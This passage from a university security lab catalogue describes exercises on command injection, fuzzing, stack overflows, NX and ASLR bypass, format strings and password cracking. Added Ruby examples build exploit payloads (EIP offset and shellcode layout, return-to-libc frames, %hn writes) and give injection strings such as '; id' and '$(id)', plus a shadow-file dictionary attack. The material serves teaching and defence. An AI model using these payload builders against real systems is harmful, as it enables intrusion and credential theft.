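# The product wraps, so an enormous count passes while the loop runs off the end.
def naive_check_passes?(count)
  u32(count * ELEM_SIZE) <= BUF_SIZE
end

# Fixed: compare count against BUF_SIZE / sizeof(int); division cannot wrap.
def safe_check_passes?(count)
  count <= BUF_SIZE / ELEM_SIZE
end

# Smallest count whose product wraps to exactly 0 (2^32 / 4 = 0x40000000).
def wrapping_count
  (UINT32_MAX + 1) / ELEM_SIZE
end

# Signed/unsigned confusion: a length read from input as int is compared signed,
# then handed to memcpy, which takes size_t.
def signed_length_check_passes?(len)
  to_int32(len) <= BUF_SIZE        # -1 <= 1024 is true
end

def as_size_t(len)
  u32(len)                          # ... but memcpy sees 4294967295
end

if $PROGRAM_NAME == __FILE__
  c = wrapping_count
  puts "count=#{c}: naive check #{naive_check_passes?(c)}, safe check #{safe_check_passes?(c)}"
  puts "len=-1: signed check #{signed_length_check_passes?(-1)}, memcpy size #{as_size_t(-1)}"
end
```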

software_security_exploitation/2_race_conditions_format_str.xml

Details

Key Data
Name Understanding Software Vulnerabilities: Injection Attacks, Race Conditions, and Format String Attacks
Description
Introduction
Software vulnerabilities can have severe consequences, stemming from design and implementation problems. These problems can range from simple memory errors and bounds checking, like buffer overflows, to more complex issues such as race conditions, format string attacks, and misconfigured security mechanisms. In this lab you will learn to identify and understand these programming flaws through hands-on exercises.

You will explore command injection vulnerabilities. You'll be tasked with creating, compiling, running, and exploiting a C program susceptible to command injection. You will investigate concepts including validation and sanitization, essential for securing your code against malicious input. You will also learn how to use the diff and patch commands to create and apply code patches, and you will investigate and attack time-of-check to time-of-use (TOCTOU) race conditions. Lastly, you'll explore format string attacks, examining their dangers and vulnerabilities.

By the end of this lab, you will have acquired a deeper understanding of software vulnerabilities and learned practical techniques to identify, prevent, and mitigate these issues in your own code. These skills are invaluable for anyone involved in software development and cybersecurity.

In your home directory you will find some binaries representing challenges to complete to receive the flags.
Lab sheet https://docs.google.com/document/d/1GKmNARyF2-RQ-jK1_w4Y7V9vNtXsJvMmvXSbnadyEoE/edit?usp=sharing
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
Linked videos https://youtu.be/nVpqjsfii6c; https://youtu.be/PH73lpG2B1M; https://youtu.be/Du3fVc_ZLiI
VM names desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
| --- | --- | --- |
| Software Security (SS) | Categories of Vulnerabilities | race condition vulnerabilities; structured output generation vulnerabilities; Format string attacks |
| Software Security (SS) | Prevention of Vulnerabilities | race condition mitigations; structured output generation mitigations |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/software_security_exploitation/2_race_conditions_format_str.xml run

View source
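
The lab's command-injection and TOCTOU exercises are in C; the following added example (not part of the lab) shows the same two bug shapes and their fixes in Ruby, so the principle is visible without the C plumbing: input must never reach a shell parser, and a check on a path must be made on the same open descriptor that is then used. The hostname pattern, the ping command and the attacker string are assumptions for illustration.

```ruby
# Added example (not from the lab): command injection and TOCTOU, vulnerable shape
# beside the fixed shape.
require 'open3'
require 'tmpdir'

HOSTNAME_RE = /\A[A-Za-z0-9](?:[A-Za-z0-9.-]{0,252}[A-Za-z0-9])?\z/

# Vulnerable shape: the whole string reaches /bin/sh, so "; id" is a second command.
def unsafe_ping_command(host)
  "ping -c 1 #{host}"
end

# Validation: accept only what a hostname or dotted-quad can contain.
def valid_hostname?(host)
  !!(host =~ HOSTNAME_RE)
end

# Fixed shape: validate, then pass separate argv elements; no shell parses them.
def safe_ping_argv(host)
  raise ArgumentError, "invalid host: #{host.inspect}" unless valid_hostname?(host)
  ["ping", "-c", "1", host]
end

# Open3 with an argv array spawns the binary directly (Process.spawn semantics).
def run_ping(host)
  out, status = Open3.capture2e(*safe_ping_argv(host))
  [status.success?, out]
end

# TOCTOU-resistant open. The racy pattern is access()/stat() on the path followed
# by open(): an attacker swaps a symlink in between the two calls. Instead, open
# with O_NOFOLLOW and inspect the descriptor you actually got (fstat), so the check
# and the use refer to the same object.
def open_regular_file_nofollow(path)
  f = File.open(path, File::RDONLY | File::NOFOLLOW)
  st = f.stat
  unless st.file?
    f.close
    raise ArgumentError, "not a regular file: #{path}"
  end
  f
end

# Constructed attacker input for the checks below.
INJECTION = "127.0.0.1; id > /tmp/pwned".freeze
```

Sanitising by stripping characters is the weaker option: an allowlist of what the field may contain, enforced before the value is used, is easier to reason about than a denylist of shell metacharacters.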

software_security_exploitation/3_bug_hunting_and_fuzzing.xml

Details

Key Data
Name Bug Hunting and Fuzzing
Description
Introduction
Identifying and fixing software vulnerabilities is of paramount importance. This lab introduces two techniques for bug hunting: Fuzzing and Static Analysis. These methods are essential for uncovering hidden security flaws in software, which can be exploited for malicious purposes if left unaddressed. Fuzzing involves sending unexpected and often malformed data as input to a program, searching for weaknesses, while Static Analysis employs automated tools to analyze the code structure for potential issues. This lab provides a hands-on experience in finding and exploiting vulnerabilities.

In this lab, you will learn how to manually audit C code to spot errors and use various fuzzing techniques to test network programs for security flaws. You will start by auditing and securing C code, identifying vulnerabilities, and fixing potential issues. You will then explore the world of fuzzing, where you will learn to use tools like Spike to send various inputs to network services to uncover potential vulnerabilities. The lab also guides you through Metasploit's FTP fuzzing module. Finally, you will apply your knowledge to CTF challenges, running and fuzzing network services to crash programs and uncover flags. By the end of this lab, you will have gained practical skills and knowledge in software security testing and vulnerability detection.
Lab sheet https://docs.google.com/document/d/1yuDcFkI2-KD4Xfti4PahE038o-6324LKSx075ZSsuKw/edit?usp=sharing
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
Linked videos https://youtu.be/nwxtlR31hvw; https://youtu.be/vT2PP7VnSNw
VM names windows_victim; kali; desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
| --- | --- | --- |
| Software Security (SS) | Detection of Vulnerabilities | dynamic detection |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/software_security_exploitation/3_bug_hunting_and_fuzzing.xml run

View source
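
The lab uses Spike and Metasploit's FTP fuzzer; the following added example (not the lab's code and not Spike) is a minimal version of what those tools do: a library of boundary strings, a seeded mutator, and a send loop that treats the next connection failing as the signal that the previous case crashed the service. The string families, the FTP exchange and the placeholder host/port are assumptions.

```ruby
# Added example (not from the lab): a Spike-style test-case generator and send loop
# for a line-based service such as the FTP server fuzzed in the lab.
require 'socket'

# Boundary lengths, format specifiers, shell metacharacters, integer limits and
# odd bytes: the same families a Spike script enumerates.
FUZZ_STRINGS = [
  "A" * 256, "A" * 1024, "A" * 4096, "A" * 65535,
  "%s" * 64, "%n" * 32, "%x" * 64,
  "-1", "0", "4294967295", "2147483648", "-2147483648",
  "../" * 32 + "etc/passwd", "|id", ";id", "`id`", "$(id)",
  "\x00".b * 32, "\xff".b * 1024, "\r\n" * 64,
].freeze

# One test case per library string, in the argument position of the given verb.
def fuzz_cases(verb, strings = FUZZ_STRINGS)
  strings.map { |s| [verb, " ", s, "\r\n"].map(&:b).join }
end

# Cheap mutation of a valid seed: bit flips, random inserts, length extension.
# Seeded RNG so a crash can be reproduced from the same seed value.
def mutate(seed_line, rounds: 8, seed: 1337)
  rng = Random.new(seed)
  bytes = seed_line.b
  rounds.times do
    case rng.rand(3)
    when 0
      i = rng.rand(bytes.bytesize)
      bytes.setbyte(i, bytes.getbyte(i) ^ (1 << rng.rand(8)))
    when 1
      bytes.insert(rng.rand(bytes.bytesize + 1), rng.bytes(rng.rand(1..16)))
    else
      bytes << ("A" * rng.rand(1..512))
    end
  end
  bytes
end

# Send every case on a fresh connection. A dead service shows up as the *next*
# connect being refused or timing out, so the case before that is the trigger.
# Not run here: host/port are whatever target you point it at.
def fuzz_ftp(host, port, cases, timeout: 3)
  cases.each_with_index do |data, idx|
    begin
      sock = Socket.tcp(host, port, connect_timeout: timeout)
      sock.readpartial(4096)                      # 220 banner
      sock.write("USER anonymous\r\n")
      sock.readpartial(4096)                      # 331 reply
      sock.write(data)
      IO.select([sock], nil, nil, timeout) ? sock.readpartial(4096) : nil
      sock.close
    rescue Errno::ECONNREFUSED, Errno::ETIMEDOUT, Errno::ECONNRESET, EOFError => e
      return { crashed_after_case: idx - 1, error: e.class.name,
               payload: idx.zero? ? nil : cases[idx - 1] }
    end
  end
  nil
end
```

Attach a debugger to the service before starting the loop; the payload recorded on failure is the one to replay while watching the crash.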

software_security_exploitation/4_exploit_development.xml

Details

Key Data
Name Exploit Development
Description
Introduction
Exploit development involves identifying and exploiting vulnerabilities in software or systems, potentially granting unauthorized access. In this hands-on lab, you will delve into the advanced topic of exploit development, focusing on Windows stack-smashing buffer overflows, a common type of vulnerability.

Throughout this lab, you will work on a Kali Linux system as the attacker and a Windows VM as the victim/debugger, targeting a vulnerable FTP server. The lab guides you through several crucial steps, including manual exploitation, writing your first Metasploit (MSF) exploit module, finding the offset within the input that overwrites the EIP (Extended Instruction Pointer), adding shellcode to control the target system, and ultimately gaining remote access to the compromised system. By the end of this lab, you will have not only gained theoretical knowledge of exploit development but also practical experience in crafting and launching your own exploits against real-world vulnerabilities.
Lab sheet https://docs.google.com/document/d/1tsKUaCetdqwDmey4JK9DYrcO9XDx4EwE2RIvSbP6zQQ/edit?usp=sharing
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
Linked videos https://youtu.be/Zh7IdmnCfy0; https://youtu.be/WU06L-u0t2Q; https://youtu.be/j2S-XgY-Fyg; https://youtu.be/Lf1UPaqPJMM; https://youtu.be/5OUQ7ExlgKI
VM names windows_victim; kali; windows_victim_server

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
| --- | --- | --- |
| Software Security (SS) | Categories of Vulnerabilities | memory management vulnerabilities; Stack smashing buffer overflows |
| Malware & Attack Technology (MAT) | Attacks and exploitation | EXPLOITATION; EXPLOITATION FRAMEWORKS; Exploit development; Metasploit Framework development |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/software_security_exploitation/4_exploit_development.xml run

View source

software_security_exploitation/5_linux_stack_bof.xml

Details

Key Data
Name Writing Exploits: Linux and Stack-smashing Buffer Overflows
Description
Introduction
Buffer overflows are a common security issue that can be exploited to gain unauthorized access to a system or execute malicious code. In this lab you will delve deeper into the world of buffer overflow vulnerabilities, this time on Linux systems, expanding upon the skills learned in the previous lab. The exercises will cover both manual exploitation techniques and the development of Metasploit exploits, while introducing Capture The Flag (CTF) challenges of increasing complexity. By the end of this lab, you will have a deeper understanding of exploit development, honing your skills in identifying and exploiting buffer overflows on both Windows and Linux, further enriching your knowledge in the world of cybersecurity.

Throughout this lab, you will learn how to identify and exploit buffer overflow vulnerabilities in Linux applications. You will start by manually causing buffer overflows, identifying memory addresses, and understanding the significance of these addresses. Subsequently, you will create Metasploit exploit modules to automate the exploitation process. The lab includes Capture The Flag (CTF) challenges, where you will create and deploy attacks to gain shell access and complete specific objectives. The challenges will require you to jump to existing code, inject your own shellcode, and tackle varying levels of complexity. By the end of this lab, you will have a solid grasp of exploit development and practical experience in exploiting buffer overflow vulnerabilities on Linux systems.
Lab sheet https://docs.google.com/document/d/1wgxLYHkdeLknRcbzZY73xZt36TWExuu-lfIJhRuHE-I/edit?usp=sharing
Type ctf-lab; lab-sheet
Author Thomas Shaw
Linked videos https://youtu.be/oi_CfBe_umU; https://youtu.be/Wry2get_RRc
VM names metactf_desktop; kali

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
| --- | --- | --- |
| Software Security (SS) | Categories of Vulnerabilities | memory management vulnerabilities; Stack smashing buffer overflows |
| Malware & Attack Technology (MAT) | Attacks and exploitation | EXPLOITATION; EXPLOITATION FRAMEWORKS; Exploit development; Metasploit Framework development |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/software_security_exploitation/5_linux_stack_bof.xml run

View source
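
Both the Windows exploit-development lab and this Linux one turn on the same two steps: find the offset at which the saved return address (EIP) is overwritten, then lay out junk, return address, NOP sled and shellcode. The following added example (not from either lab and not Metasploit's source) reimplements the pattern_create/pattern_offset technique that Metasploit uses for the first step and builds the payload for the second. The return address, the INT3 placeholder shellcode and the buffer sizes are assumptions; real values come from the debugger.

```ruby
# Added example (not from the labs or Metasploit): EIP offset discovery and
# stack-smashing payload layout, the way an MSF exploit module does it.

# Rex::Text.pattern_create equivalent: "Aa0Aa1Aa2...Zz9". Any 4-byte window is
# unique within the 20280-byte cycle, so the dword that lands in EIP pins its offset.
def pattern_create(length)
  out = String.new
  ('A'..'Z').each do |u|
    ('a'..'z').each do |l|
      ('0'..'9').each do |d|
        out << u << l << d
        return out[0, length] if out.length >= length
      end
    end
  end
  out[0, length]
end

# pattern_offset equivalent. Takes EIP as the debugger shows it ("37694136" or
# 0x37694136) or as the raw 4 bytes, undoes the little-endian load, and searches.
def pattern_offset(eip_value, length = 20280)
  needle = case eip_value
           when Integer then [eip_value].pack('V')
           when /\A(0x)?\h{8}\z/ then [eip_value.sub(/\A0x/, '').hex].pack('V')
           else eip_value
           end
  pattern_create(length).index(needle)
end

# Layout of the finished overwrite:
#   [junk up to the saved EIP][new EIP][NOP sled][shellcode][filler to a fixed size]
# `ret` is a JMP ESP (or equivalent) address in a non-rebased module of the victim;
# after the ret, ESP points just past the overwritten EIP, so execution lands in
# the sled and slides into the shellcode.
def build_payload(offset:, ret:, shellcode:, nops: 16, total: nil)
  buf = String.new                       # ASCII-8BIT buffer
  buf << ("A" * offset)
  buf << [ret].pack('V')                 # 32-bit little-endian, as MSF's [x].pack('V')
  buf << ("\x90".b * nops)
  buf << shellcode.b
  buf << ("C" * (total - buf.bytesize)) if total && total > buf.bytesize
  buf
end

# Placeholders: four INT3s stand in for shellcode (a common first test, since the
# debugger breaks the moment control reaches the sled), and the address is fake.
TEST_SHELLCODE = "\xcc".b * 4
RET_PLACEHOLDER = 0xdeadbeef

if $PROGRAM_NAME == __FILE__
  pat = pattern_create(1000)
  eip = pat.byteslice(512, 4).unpack1('V')
  puts "EIP=0x#{eip.to_s(16)} -> offset #{pattern_offset(eip)}"
end
```

Once the offset is known, re-run with `"A" * offset + "BBBB"` and confirm EIP reads 0x42424242 before spending time on the return address and shellcode; a wrong offset is the most common reason an otherwise correct exploit does nothing.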

software_security_exploitation/6_linux_nx_bypass.xml

Details

Key Data
Name Linux bypassing NX bit with return-to-libc
Description
Introduction
In this lab, you will develop your knowledge of memory protections and exploit techniques. The focus is on bypassing Non-Executable (NX) stack protection, which stops attackers from running code they have placed on the stack. You'll explore the theoretical concept of NX stack protection, understand how it is implemented in Linux, and learn about return-to-libc attacks, an exploit technique that redirects a program's execution into functions already present in the Standard C Library (libc), so that no injected code ever needs to execute.

Throughout this lab, you will learn how to bypass NX stack protection and write return-to-libc exploits. You will find the offset for the Instruction Pointer (EIP), identify the memory addresses of essential functions like execve() and exit() within libc, and construct a fake stack frame to trigger a shell using these functions. As practical tasks, you will write a Metasploit exploit module, analyze memory addresses, and run your exploit to successfully gain control over a vulnerable program.

The CTF challenges are similar to those from the last topic, however the vulnerable software has been compiled with stack protections and non-executable stack, which you will learn to circumvent.
Lab sheet https://docs.google.com/document/d/1eUOb1cR-D8qv0NmlGXYUN1JYwmgrwOBNtfsDVdxnPpw/edit?usp=sharing
Type ctf-lab; lab-sheet
Author Thomas Shaw
Linked videos https://youtu.be/ywLXfSR5YWk
VM names metactf_desktop; kali

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
| --- | --- | --- |
| Software Security (SS) | Categories of Vulnerabilities | memory management vulnerabilities; Stack smashing buffer overflows |
| Software Security (SS) | Mitigating Exploitation | NON-EXECUTABLE MEMORY |
| Malware & Attack Technology (MAT) | Attacks and exploitation | EXPLOITATION; EXPLOITATION FRAMEWORKS; Exploit development; Metasploit Framework development; Mitigation bypass: non-executable memory |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/software_security_exploitation/6_linux_nx_bypass.xml run

View source

software_security_exploitation/7_linux_aslr_bypass.xml

Details

Key Data
Name Linux ASLR bypass
Description
Introduction
Address Space Layout Randomization (ASLR) is a critical security feature in modern operating systems. ASLR randomizes the memory addresses of various program components, making it challenging for attackers to exploit vulnerabilities. You'll explore challenges designed to help you understand how ASLR works and how to bypass it.

Throughout the lab, you'll learn how to leverage information leaks and brute-force attacks to overcome ASLR, PIE and RelRO. You'll set up your exploit development environment using the Metasploit framework, identify the offsets and addresses of critical functions, and craft exploits to control program execution. Specifically, you will capture an information leak, calculate function offsets, and redirect control flow to a target function. Subsequently, you'll tackle a more complex scenario where there's no information leak, relying on brute-force to bypass ASLR and gain access to a hidden flag. These practical tasks will equip you with valuable skills in vulnerability exploitation and security assessment.
Lab sheet https://docs.google.com/document/d/1NVWjD257EN0pv14G6dD44VpSPYlrR6IC2HPihrsGPnY/edit?usp=sharing
Type ctf-lab; lab-sheet
Author Thomas Shaw
Linked videos https://youtu.be/v2rChKDAmFg; https://youtu.be/xwsBaNQZozg
VM names metactf_desktop; kali

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
| --- | --- | --- |
| Software Security (SS) | Categories of Vulnerabilities | memory management vulnerabilities; Stack smashing buffer overflows |
| Software Security (SS) | Mitigating Exploitation | ASLR (ADDRESS SPACE LAYOUT RANDOMIZATION) |
| Malware & Attack Technology (MAT) | Attacks and exploitation | EXPLOITATION; EXPLOITATION FRAMEWORKS; Exploit development; Metasploit Framework development; Mitigation bypass: ASLR |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/software_security_exploitation/7_linux_aslr_bypass.xml run

View source
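
The NX-bypass lab above builds a fake stack frame from fixed libc addresses; the ASLR lab then has you recover those addresses at runtime from an information leak. The following added example (not from either lab) shows the arithmetic behind both: the 32-bit return-to-libc frame, and rebasing it from one leaked pointer. Every offset and the leaked value are constructed placeholders, and the example uses system() where the lab sheet works with execve(); the frame shape is the same, with more argument slots for execve.

```ruby
# Added example (not from the labs): return-to-libc frame construction and libc
# rebasing from an information leak. All numbers below are fabricated for the
# example; read the real ones from the target's libc.

# 32-bit ret2libc frame. The overwritten saved EIP becomes system(); what system()
# pops as its own return address is exit(); system()'s first argument slot holds a
# pointer to the "/bin/sh" string that libc itself contains. Nothing on the stack
# is executed, which is why NX does not interfere.
def ret2libc_frame(offset:, system:, exit_fn:, binsh:)
  String.new << ("A" * offset) << [system, exit_fn, binsh].pack('V3')
end

# ASLR moves the whole library but not the distances inside it. One leaked pointer
# to a known symbol gives the load base; libc is page-aligned, so a misaligned
# result means the wrong symbol or the wrong libc build was assumed.
def libc_base_from_leak(leaked_addr, symbol_offset)
  base = leaked_addr - symbol_offset
  raise ArgumentError, "base 0x#{base.to_s(16)} is not page-aligned" unless (base % 0x1000).zero?
  base
end

def rebase(base, offsets)
  offsets.transform_values { |off| base + off }
end

# Constructed offsets and leak, NOT real values. On the target you would use:
#   readelf -s /lib/i386-linux-gnu/libc.so.6 | grep -E ' (puts|system|exit)@@'
#   strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh
FAKE_OFFSETS = { puts: 0x00067560, system: 0x0003d200, exit_fn: 0x0002f9d0, binsh: 0x0017e0cf }.freeze
FAKE_LEAK = 0xf7e12560   # as if the program printed the resolved GOT entry for puts

if $PROGRAM_NAME == __FILE__
  base = libc_base_from_leak(FAKE_LEAK, FAKE_OFFSETS[:puts])
  addrs = rebase(base, FAKE_OFFSETS)
  frame = ret2libc_frame(offset: 76, **addrs.slice(:system, :exit_fn, :binsh))
  puts "libc base 0x#{base.to_s(16)}, frame #{frame.bytesize} bytes"
end
```

Without a leak (the lab's second scenario) the same frame is sent repeatedly with a guessed base; on 32-bit targets the number of candidate bases is small enough that the loop finishes, which is the brute-force case the lab describes.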

software_security_exploitation/8_linux_bof_format.xml

Details

Key Data
Name Linux Buffer Overflows and Advanced Format String Attacks
Description
Introduction
In this lab, you will face some additional challenges designed to help you develop your understanding of software security and vulnerabilities. You will learn how to perform Format String Attacks, a type of vulnerability that allows attackers to manipulate the memory of a program by exploiting how it handles format specifiers. Additionally, you will further explore Buffer Overflows, a common security issue that arises when programs do not properly manage memory, leading to the overwriting of critical data.
Lab sheet https://docs.google.com/document/d/1Ap-h6YSDtfU4bLwiKhxP5x2nf1vjSJ2V2zEL5wzW84U/edit?usp=sharing
Type ctf-lab; lab-sheet
Author Thomas Shaw
VM names metactf_desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
| --- | --- | --- |
| Software Security (SS) | Categories of Vulnerabilities | memory management vulnerabilities; Stack smashing buffer overflows; Format string attacks |
| Malware & Attack Technology (MAT) | Attacks and exploitation | EXPLOITATION; EXPLOITATION FRAMEWORKS; Exploit development; Metasploit Framework development |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/software_security_exploitation/8_linux_bof_format.xml run

View source
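
The advanced format string material above is about turning printf(buf) into a write. The following added example (not from the lab) computes the classic two-short write: four copies of the target address at the start of the buffer, %08x conversions to step over the earlier stack arguments, and a padded %x before each %hn so the running character count equals the half-word to be written. A small emulator of printf's counting checks the result. The target address, value and stack position are hypothetical.

```ruby
# Added example (not from the lab): arbitrary 32-bit write via a format string,
# using two %hn writes, plus an emulator of printf's argument/character accounting.

# arg_pos: the stack argument number at which our buffer begins, found by
# printing "AAAA%08x%08x..." and counting until 41414141 appears.
def fmt_write32(target_addr, value, arg_pos)
  # Two copies per half: the %<pad>x consumes one, the %hn that follows consumes the
  # other (sequential conversions, so no positional "$" mixing is needed).
  addrs = [target_addr, target_addr, target_addr + 2, target_addr + 2].pack('V4')
  raise ArgumentError, "address contains a NUL byte; printf would stop at it" if addrs.include?("\x00")
  fmt = String.new
  fmt << "%08x" * (arg_pos - 1)                    # step over the arguments before our buffer
  written = addrs.bytesize + 8 * (arg_pos - 1)     # characters printed so far
  [value & 0xffff, (value >> 16) & 0xffff].each do |half|
    pad = (half - written) % 0x10000               # make the count congruent to half (mod 2^16)
    pad += 0x10000 if pad < 8                      # %x of a dword needs at least 8 columns
    fmt << "%#{pad}x%hn"
    written += pad
  end
  addrs + fmt
end

# Emulate the vulnerable printf(buf): stack arguments from arg_pos onward are the
# dwords of our own buffer; earlier ones are other stack data (zeros here).
def simulate_printf_writes(payload, arg_pos)
  args = Array.new(arg_pos - 1, 0) + payload.unpack('V4')
  written = 16                                      # the four address dwords print first
  memory = {}
  payload.byteslice(16..-1).scan(/%(\d*)(x|hn)/) do |width, conv|
    arg = args.shift
    case conv
    when 'x'  then written += [width.to_i, arg.to_s(16).length].max
    when 'hn' then memory[arg] = written & 0xffff  # %hn stores the low 16 bits of the count
    end
  end
  memory
end

def read32(memory, addr)
  memory.fetch(addr) | (memory.fetch(addr + 2) << 16)
end

if $PROGRAM_NAME == __FILE__
  payload = fmt_write32(0x0804a028, 0xdeadbeef, 7)   # hypothetical GOT slot and value
  mem = simulate_printf_writes(payload, 7)
  puts "wrote 0x#{read32(mem, 0x0804a028).to_s(16)} with a #{payload.bytesize}-byte format string"
end
```

The NUL check matters in practice: a target address such as 0x08040000 cannot sit at the front of the buffer because printf stops at the first zero byte, and the usual workaround is to move the addresses to the end of the string and adjust the counts.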

systems_security/1_authentication.xml

Details

Key Data
Name Authentication lab
Description
Introduction
Authentication is the process of verifying a user's identity, ensuring that individuals are who they claim to be before granting them access to systems and resources. This lab will provide you with hands-on experience, enabling you to explore the intricacies of user accounts and identity on Unix/Linux systems, gain insights into password storage and hashing, and even attempt to crack passwords using dictionary attacks. By the end of this lab, you will have a deeper understanding of how authentication works, the role of password security, and the importance of safeguarding user identities.

Throughout this lab, you will learn about user accounts, their attributes, and their association with user and group IDs. You'll also explore the concept of salts in password hashing, understand the strengths and weaknesses of different passwords, and attempt to crack passwords using tools like John the Ripper. Practical tasks include examining the system's /etc/passwd and /etc/group files, changing user identities, and analyzing the /etc/shadow file to understand password storage. By actively engaging in these activities, you will gain a comprehensive understanding of authentication processes and the key factors that contribute to securing user identities in Unix/Linux systems.

Hackerbot and CTF challenges
This is a Hackerbot lab. The labsheet is available once you claim a set of VMs. Work through the labsheet, then when prompted interact with Hackerbot.

The Hackerbot tasks in this lab involve configuring new users and group membership. Then you will attempt to crack the passwords of users on the desktop VM whose user IDs (UIDs) are higher than 1001. After successfully cracking passwords, you will use these credentials to SSH into the separate server VM, where you will discover flags. This task showcases the practical implications of password security and cracking.

Lecture
Slides here

Reading
Chapter 11 "Authentication": Bishop, M. (2004), Introduction to Computer Security, Addison-Wesley. (ISBN-10: 0321247442)
Type ctf-lab; hackerbot-lab; lab-sheet
Author Z. Cliffe Schreuders
Linked videos https://youtu.be/2I_JSdTu-oI; https://youtu.be/pGcJEML1mRo; https://youtu.be/icC2Zrno_uM; https://youtu.be/Wrg6XZu6Luw
VM names desktop; server; hackerbot_server; kali_cracker

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
| --- | --- | --- |
| Authentication, Authorisation & Accountability (AAA) | Authentication | identity management; user authentication; facets of authentication; Cryptography and authentication (hashes and attacks against authentication schemes / passwords) |
| Operating Systems & Virtualisation (OSV) | Primitives for Isolation and Mediation | authentication and identification; Linux authentication; Types of user accounts |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/systems_security/1_authentication.xml run

View source
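
The lab has you read /etc/passwd and /etc/shadow and crack the high-UID accounts with John the Ripper. The following added example (not from the lab) shows the loop that John runs underneath: parse the shadow records, and re-hash each wordlist candidate with that record's own salt. To stay self-contained it uses SHA-512(salt || password) as a stand-in for crypt(3)'s $6$ scheme, which is iterated and encoded differently; on a Linux box you would substitute String#crypt to work on real shadow data. All users, salts and hashes are constructed.

```ruby
# Added example (not from the lab): shadow/passwd parsing and a salted dictionary
# attack. stand_in_hash replaces crypt(3) so the file runs anywhere.
require 'digest'

ShadowEntry = Struct.new(:user, :salt, :digest)

# Stand-in for crypt(3): same salt + same password gives the same digest; a
# different salt gives an unrelated digest, so two users sharing a password
# cannot be spotted by comparing hashes, and precomputed tables are useless.
def stand_in_hash(salt, password)
  Digest::SHA512.hexdigest("#{salt}#{password}")
end

# shadow format: user:$id$salt$hash:lastchg:min:max:warn:inactive:expire:
# Locked or passwordless accounts carry "!" or "*" instead of a hash; skip them.
def parse_shadow_line(line)
  user, field, _rest = line.split(':', 3)
  return nil if field.nil? || field.empty? || field.start_with?('!', '*')
  _, _id, salt, digest = field.split('$', 4)
  ShadowEntry.new(user, salt, digest)
end

# passwd format: user:x:uid:gid:gecos:home:shell. The Hackerbot task targets
# accounts with UIDs above 1001.
def users_with_uid_above(passwd_lines, min_uid)
  passwd_lines.map { |l| l.split(':') }.select { |f| f[2].to_i > min_uid }.map(&:first)
end

# Dictionary attack: hash every candidate with the entry's own salt and compare.
def dictionary_attack(entries, wordlist, hasher: method(:stand_in_hash))
  entries.each_with_object({}) do |e, cracked|
    hit = wordlist.find { |w| hasher.call(e.salt, w) == e.digest }
    cracked[e.user] = hit if hit
  end
end

# Constructed sample data.
SAMPLE_WORDLIST = %w[123456 password letmein qwerty dragon].freeze
SAMPLE_PASSWD = [
  "root:x:0:0:root:/root:/bin/bash",
  "alice:x:1000:1000::/home/alice:/bin/bash",
  "bob:x:1002:1002::/home/bob:/bin/bash",
  "carol:x:1003:1003::/home/carol:/bin/bash",
].freeze
SAMPLE_SHADOW = [
  "alice:$6$k3Fq9z$#{stand_in_hash('k3Fq9z', 'letmein')}:19000:0:99999:7:::",
  "bob:$6$Xy71Lp$#{stand_in_hash('Xy71Lp', 'letmein')}:19000:0:99999:7:::",
  "carol:$6$Zp0aQq$#{stand_in_hash('Zp0aQq', 'correct horse battery staple')}:19000:0:99999:7:::",
  "daemon:*:19000:0:99999:7:::",
].freeze

if $PROGRAM_NAME == __FILE__
  entries = SAMPLE_SHADOW.map { |l| parse_shadow_line(l) }.compact
  puts dictionary_attack(entries, SAMPLE_WORDLIST).inspect
end
```

Alice and bob share a password but their digests differ, which is the point of the salt; carol's passphrase is not in the wordlist and stays uncracked, which is the point of choosing one that is not.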

systems_security/2_pam.xml

Details

Key Data
Name Pluggable Authentication Modules lab
Description
Introduction
In this lab, you will explore Pluggable Authentication Modules (PAM) and Secure Shell (SSH) to enhance your understanding of authentication and security in Linux and Unix-like systems. PAM is a component that allows for the flexibility and extensibility of authentication methods, making it possible for various programs to leverage different authentication schemes, providing a standardized way to configure and manage authentication rules.

Throughout the lab, you will gain hands-on experience with PAM by examining available PAM modules, understanding the structure of PAM configuration files, and making modifications to enforce policies including: password complexity requirements, time constraints, lockout policies after repeated login failures, creating home directories, enforcing session limits through cron jobs. You will also explore SSH password-less authentication, a powerful method of securely accessing remote systems without the need for traditional passwords. By generating SSH key pairs and configuring authorized keys, you will learn how to enhance the security and convenience of remote access.

By the end of this lab, you will have a solid grasp of PAM's role in authentication, the benefits of SSH key-based authentication, and the practical skills to enhance the security and usability of authentication mechanisms in Linux systems.

Hackerbot and CTF challenges
This is a Hackerbot lab. The labsheet is available once you claim a set of VMs. Work through the labsheet, then when prompted interact with Hackerbot.

The Hackerbot tasks involve configuring password policies, testing your ability to use PAM to enhance authentication security.

Lecture
Slides continued here

Reading
Chapter 4 "Users, Passwords, and Authentication": Garfinkel, S. Spafford, G. and Schwartz, A. (2003), Practical Unix and Internet Security, O'Reilly. (ISBN-10: 0596003234)
Type ctf-lab; hackerbot-lab; lab-sheet
Author Z. Cliffe Schreuders
Linked videos https://youtu.be/z4L6Yv5ry1A; https://youtu.be/-zcnfmoLjYI; https://youtu.be/xHs3LB4Yyrk; https://youtu.be/c2dPdQmaVyo; https://youtu.be/dCBabesIXo8; https://youtu.be/rhdcxhSDqp4; https://youtu.be/PCXK2cK8tpE
VM names desktop; server; hackerbot_server

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
| --- | --- | --- |
| Authentication, Authorisation & Accountability (AAA) | Authentication | identity management; user authentication; facets of authentication |
